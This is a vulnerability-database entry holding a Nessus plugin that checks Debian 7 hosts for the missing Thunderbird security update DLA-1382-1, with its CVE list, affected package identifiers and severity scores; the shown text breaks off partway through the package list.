"bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2018-05-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:iceowl-l10n-sv-se", "p-cpe:/a:debian:debian_linux:icedove-l10n-nb-no", "p-cpe:/a:debian:debian_linux:lightning-l10n-en-gb", "p-cpe:/a:debian:debian_linux:icedove-l10n-sr", "p-cpe:/a:debian:debian_linux:icedove-l10n-pt-br", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-br", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-nl", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-ta-lk", "p-cpe:/a:debian:debian_linux:icedove-l10n-hsb", "p-cpe:/a:debian:debian_linux:lightning-l10n-ru", "p-cpe:/a:debian:debian_linux:iceowl-l10n-hu", "p-cpe:/a:debian:debian_linux:lightning-l10n-lt", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-dsb", "p-cpe:/a:debian:debian_linux:lightning-l10n-it", "p-cpe:/a:debian:debian_linux:iceowl-l10n-cs", "p-cpe:/a:debian:debian_linux:lightning-l10n-ca", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-vi", "p-cpe:/a:debian:debian_linux:iceowl-l10n-eu", "p-cpe:/a:debian:debian_linux:lightning-l10n-ro", "p-cpe:/a:debian:debian_linux:icedove-l10n-ko", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-bn-bd", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-tr", "p-cpe:/a:debian:debian_linux:icedove-l10n-hr", "p-cpe:/a:debian:debian_linux:iceowl-l10n-nn-no", "p-cpe:/a:debian:debian_linux:icedove-l10n-en-gb", "p-cpe:/a:debian:debian_linux:lightning-l10n-sq", "p-cpe:/a:debian:debian_linux:icedove-l10n-el", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-sl", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-ast", "p-cpe:/a:debian:debian_linux:icedove-l10n-sv-se", "p-cpe:/a:debian:debian_linux:icedove-l10n-ja", "p-cpe:/a:debian:debian_linux:iceowl-l10n-kab", "p-cpe:/a:debian:debian_linux:icedove-l10n-sk", "p-cpe:/a:debian:debian_linux:lightning-l10n-es-es", "p-cpe:/a:debian:debian_linux:lightning-l10n-zh-tw", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-id", "p-cpe:/a:debian:debian_linux:iceowl-l10n-ca", "p-cpe:/a:debian:debian_linux:icedove-l10n-all", "p-cpe:/a:debian:debian_linux:iceowl-l10n-zh-tw", "p-cpe:/a:debian:debian_linux:iceowl-l10n-nl", "p-cpe:/a:debian:debian_linux:iceowl-l10n-sr", "p-cpe:/a:debian:debian_linux:icedove-l10n-cs", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-bg", "p-cpe:/a:debian:debian_linux:iceowl-l10n-sl", "p-cpe:/a:debian:debian_linux:lightning-l10n-sl", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-it", "p-cpe:/a:debian:debian_linux:icedove-l10n-de", "p-cpe:/a:debian:debian_linux:icedove-l10n-ca", "p-cpe:/a:debian:debian_linux:lightning-l10n-es-ar", "p-cpe:/a:debian:debian_linux:iceowl-l10n-si", "p-cpe:/a:debian:debian_linux:icedove-l10n-fi", "p-cpe:/a:debian:debian_linux:lightning-l10n-si", "p-cpe:/a:debian:debian_linux:iceowl-l10n-id", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-fr", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-zh-tw", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-zh-cn", "p-cpe:/a:debian:debian_linux:icedove-l10n-pa-in", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-ro", "p-cpe:/a:debian:debian_linux:lightning-l10n-hr", "p-cpe:/a:debian:debian_linux:icedove-l10n-ast", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-sv-se", "p-cpe:/a:debian:debian_linux:iceowl-l10n-ar", "p-cpe:/a:debian:debian_linux:icedove-l10n-zh-tw", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-ja", "p-cpe:/a:debian:debian_linux:iceowl-l10n-nb-no", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-sr", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-da", "p-cpe:/a:debian:debian_linux:lightning-l10n-ta-lk", "p-cpe:/a:debian:debian_linux:lightning-l10n-pt-pt", "p-cpe:/a:debian:debian_linux:icedove-l10n-ro", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-hy-am", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-cs", "p-cpe:/a:debian:debian_linux:icedove-l10n-be", "p-cpe:/a:debian:debian_linux:iceowl-l10n-gd", "p-cpe:/a:debian:debian_linux:iceowl-l10n-bg", "p-cpe:/a:debian:debian_linux:iceowl-l10n-tr", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-et", "p-cpe:/a:debian:debian_linux:icedove-l10n-et", "p-cpe:/a:debian:debian_linux:icedove-l10n-bn-bd", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-ca", "p-cpe:/a:debian:debian_linux:lightning-l10n-vi", "p-cpe:/a:debian:debian_linux:iceowl-l10n-hy-am", "p-cpe:/a:debian:debian_linux:icedove-l10n-ta-lk", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-de", "p-cpe:/a:debian:debian_linux:icedove-l10n-uk", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-eu", "p-cpe:/a:debian:debian_linux:lightning-l10n-nb-no", "p-cpe:/a:debian:debian_linux:icedove-l10n-si", "p-cpe:/a:debian:debian_linux:icedove-l10n-it", "p-cpe:/a:debian:debian_linux:calendar-google-provider", "p-cpe:/a:debian:debian_linux:lightning-l10n-de", "p-cpe:/a:debian:debian_linux:lightning-l10n-ga-ie", "p-cpe:/a:debian:debian_linux:lightning-l10n-id", "p-cpe:/a:debian:debian_linux:iceowl-l10n-ko", "p-cpe:/a:debian:debian_linux:icedove-l10n-hu", "p-cpe:/a:debian:debian_linux:icedove-l10n-br", "p-cpe:/a:debian:debian_linux:lightning-l10n-be", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-ru", "p-cpe:/a:debian:debian_linux:icedove-l10n-sq", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-hr", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-sq", "p-cpe:/a:debian:debian_linux:iceowl-l10n-pt-br", "p-cpe:/a:debian:debian_linux:lightning-l10n-fi", "p-cpe:/a:debian:debian_linux:lightning-l10n-ar", "p-cpe:/a:debian:debian_linux:lightning-l10n-el", "p-cpe:/a:debian:debian_linux:lightning-l10n-pa-in", "p-cpe:/a:debian:debian_linux:iceowl-l10n-pa-in", "p-cpe:/a:debian:debian_linux:lightning-l10n-nl", "p-cpe:/a:debian:debian_linux:iceowl-l10n-ast", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-ko", "p-cpe:/a:debian:debian_linux:icedove-l10n-nn-no", "p-cpe:/a:debian:debian_linux:lightning-l10n-ja", "p-cpe:/a:debian:debian_linux:lightning-l10n-fr", "p-cpe:/a:debian:debian_linux:iceowl-l10n-es-ar", "p-cpe:/a:debian:debian_linux:iceowl-l10n-hsb", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-nn-no", "p-cpe:/a:debian:debian_linux:icedove-l10n-pt-pt", "p-cpe:/a:debian:debian_linux:lightning-l10n-hsb", "p-cpe:/a:debian:debian_linux:lightning-l10n-tr", "p-cpe:/a:debian:debian_linux:lightning-l10n-is", "p-cpe:/a:debian:debian_linux:iceowl-l10n-el", "p-cpe:/a:debian:debian_linux:icedove-l10n-fy-nl", "p-cpe:/a:debian:debian_linux:iceowl-l10n-de", "p-cpe:/a:debian:debian_linux:iceowl-l10n-he", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-pt-pt", "p-cpe:/a:debian:debian_linux:iceowl-l10n-sq", "p-cpe:/a:debian:debian_linux:lightning-l10n-sv-se", "p-cpe:/a:debian:debian_linux:iceowl-l10n-et", "p-cpe:/a:debian:debian_linux:iceowl-l10n-gl", "p-cpe:/a:debian:debian_linux:lightning-l10n-dsb", "p-cpe:/a:debian:debian_linux:iceowl-l10n-sk", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-si", "p-cpe:/a:debian:debian_linux:iceowl-l10n-fr", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-lt", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-es-ar", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-he", "p-cpe:/a:debian:debian_linux:icedove-l10n-kab", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-gl", "p-cpe:/a:debian:debian_linux:iceowl-l10n-is", "p-cpe:/a:debian:debian_linux:icedove-l10n-es-ar", "p-cpe:/a:debian:debian_linux:iceowl-l10n-ru", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-el", "p-cpe:/a:debian:debian_linux:thunderbird-dbg", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-rm", "p-cpe:/a:debian:debian_linux:icedove-l10n-tr", "p-cpe:/a:debian:debian_linux:icedove-dbg", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-fi", "p-cpe:/a:debian:debian_linux:lightning-l10n-sr", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-fy-nl", "p-cpe:/a:debian:debian_linux:iceowl-l10n-br", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-pl", "p-cpe:/a:debian:debian_linux:lightning-l10n-fy-nl", "p-cpe:/a:debian:debian_linux:iceowl-l10n-fy-nl", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-pa-in", "p-cpe:/a:debian:debian_linux:iceowl-l10n-es-es", "p-cpe:/a:debian:debian_linux:icedove-l10n-pl", "p-cpe:/a:debian:debian_linux:iceowl-l10n-hr", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-es-es", "p-cpe:/a:debian:debian_linux:iceowl-l10n-it", "p-cpe:/a:debian:debian_linux:lightning-l10n-ko", "p-cpe:/a:debian:debian_linux:iceowl-l10n-dsb", "p-cpe:/a:debian:debian_linux:iceowl-l10n-cy", "p-cpe:/a:debian:debian_linux:icedove-l10n-zh-cn", "p-cpe:/a:debian:debian_linux:lightning-l10n-pt-br", "p-cpe:/a:debian:debian_linux:icedove-l10n-hy-am", "p-cpe:/a:debian:debian_linux:lightning-l10n-nn-no", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-is", "p-cpe:/a:debian:debian_linux:icedove-l10n-da", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-pt-br", "p-cpe:/a:debian:debian_linux:iceowl-l10n-fi", "p-cpe:/a:debian:debian_linux:icedove-l10n-dsb", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-be", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-ar", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-nb-no", "p-cpe:/a:debian:debian_linux:iceowl-extension", "p-cpe:/a:debian:debian_linux:lightning-l10n-uk", "p-cpe:/a:debian:debian_linux:iceowl-l10n-lt", "p-cpe:/a:debian:debian_linux:icedove-l10n-sl", "p-cpe:/a:debian:debian_linux:lightning-l10n-cs", "p-cpe:/a:debian:debian_linux:icedove-l10n-gl", "p-cpe:/a:debian:debian_linux:lightning", "p-cpe:/a:debian:debian_linux:lightning-l10n-zh-cn", "p-cpe:/a:debian:debian_linux:icedove-l10n-ru", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-hsb", "p-cpe:/a:debian:debian_linux:thunderbird-dev", "p-cpe:/a:debian:debian_linux:iceowl-l10n-pt-pt", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-ga-ie", "p-cpe:/a:debian:debian_linux:lightning-l10n-hu", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-sk", "p-cpe:/a:debian:debian_linux:iceowl-l10n-zh-cn", "p-cpe:/a:debian:debian_linux:iceowl-l10n-vi", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-kab", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-uk", "p-cpe:/a:debian:debian_linux:iceowl-l10n-en-gb", "p-cpe:/a:debian:debian_linux:lightning-l10n-he", "p-cpe:/a:debian:debian_linux:iceowl-l10n-pl", "p-cpe:/a:debian:debian_linux:iceowl-l10n-ga-ie", "p-cpe:/a:debian:debian_linux:icedove-l10n-bg", "p-cpe:/a:debian:debian_linux:icedove-l10n-rm", "p-cpe:/a:debian:debian_linux:lightning-l10n-pl", "p-cpe:/a:debian:debian_linux:lightning-l10n-br", "p-cpe:/a:debian:debian_linux:lightning-l10n-hy-am", "p-cpe:/a:debian:debian_linux:iceowl-l10n-da", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-all", "p-cpe:/a:debian:debian_linux:lightning-l10n-sk", "p-cpe:/a:debian:debian_linux:iceowl-l10n-bn-bd", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-gd", "p-cpe:/a:debian:debian_linux:lightning-l10n-bg", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-en-gb", "p-cpe:/a:debian:debian_linux:lightning-l10n-et", "p-cpe:/a:debian:debian_linux:iceowl-l10n-ja", "p-cpe:/a:debian:debian_linux:icedove-l10n-eu", "p-cpe:/a:debian:debian_linux:lightning-l10n-bn-bd", "p-cpe:/a:debian:debian_linux:icedove-l10n-gd", "p-cpe:/a:debian:debian_linux:lightning-l10n-gd", "p-cpe:/a:debian:debian_linux:icedove-dev", "p-cpe:/a:debian:debian_linux:iceowl-l10n-ro", "p-cpe:/a:debian:debian_linux:thunderbird-l10n-hu", "p-cpe:/a:debian:debian_linux:iceowl-l10n-uk", "p-cpe:/a:debian:debian_linux:lightning-l10n-eu", "p-cpe:/a:debian:debian_linux:lightning-l10n-kab", "p-cpe:/a:debian:debian_linux:icedove", "p-cpe:/a:debian:debian_linux:icedove-l10n-nl", "p-cpe:/a:debian:debian_linux:icedove-l10n-he", "p-cpe:/a:debian:debian_linux:iceowl-l10n-ta-lk", "p-cpe:/a:debian:debian_linux:icedove-l10n-vi", "p-cpe:/a:debian:debian_linux:lightning-l10n-cy", "p-cpe:/a:debian:debian_linux:icedove-l10n-lt", "p-cpe:/a:debian:debian_linux:iceowl-l10n-rm", "p-cpe:/a:debian:debian_linux:lightning-l10n-gl", "p-cpe:/a:debian:debian_linux:lightning-l10n-ast", "p-cpe:/a:debian:debian_linux:icedove-l10n-is", "p-cpe:/a:debian:debian_linux:thunderbird", "p-cpe:/a:debian:debian_linux:icedove-l10n-ga-ie", "p-cpe:/a:debian:debian_linux:icedove-l10n-fr", "p-cpe:/a:debian:debian_linux:icedove-l10n-ar", "p-cpe:/a:debian:debian_linux:icedove-l10n-es-es", "p-cpe:/a:debian:debian_linux:icedove-l10n-id", "p-cpe:/a:debian:debian_linux:lightning-l10n-rm", "p-cpe:/a:debian:debian_linux:lightning-l10n-da", "p-cpe:/a:debian:debian_linux:iceowl-l10n-be"], "id": "DEBIAN_DLA-1382.NASL", "href": "https://www.tenable.com/plugins/nessus/110158", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1382-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110158);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n\n script_name(english:\"Debian DLA-1382-1 : thunderbird security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in Thunderbird, which may\nlead to the execution of arbitrary code, denial of service or attacks\non encrypted emails.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1:52.8.0-1~deb7u1.\n\nWe recommend that you upgrade your thunderbird packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/05/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/thunderbird\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:calendar-google-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-ast\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-be\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-bn-bd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-dsb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-en-gb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-es-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-es-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-fy-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-ga-ie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-hr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-hsb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-hy-am\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-kab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-nb-no\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-nn-no\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-pa-in\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-pt-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-pt-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-rm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-si\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-sq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-sr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-sv-se\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-ta-lk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-zh-cn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-l10n-zh-tw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-extension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-ast\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-be\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-bn-bd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-cy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-dsb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-en-gb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-es-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-es-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-fy-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-ga-ie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-hr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-hsb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-hy-am\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-kab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-nb-no\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-nn-no\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-pa-in\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-pt-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-pt-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-rm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-ro\");\n script_set_attribute(attribute:\"cpe\", 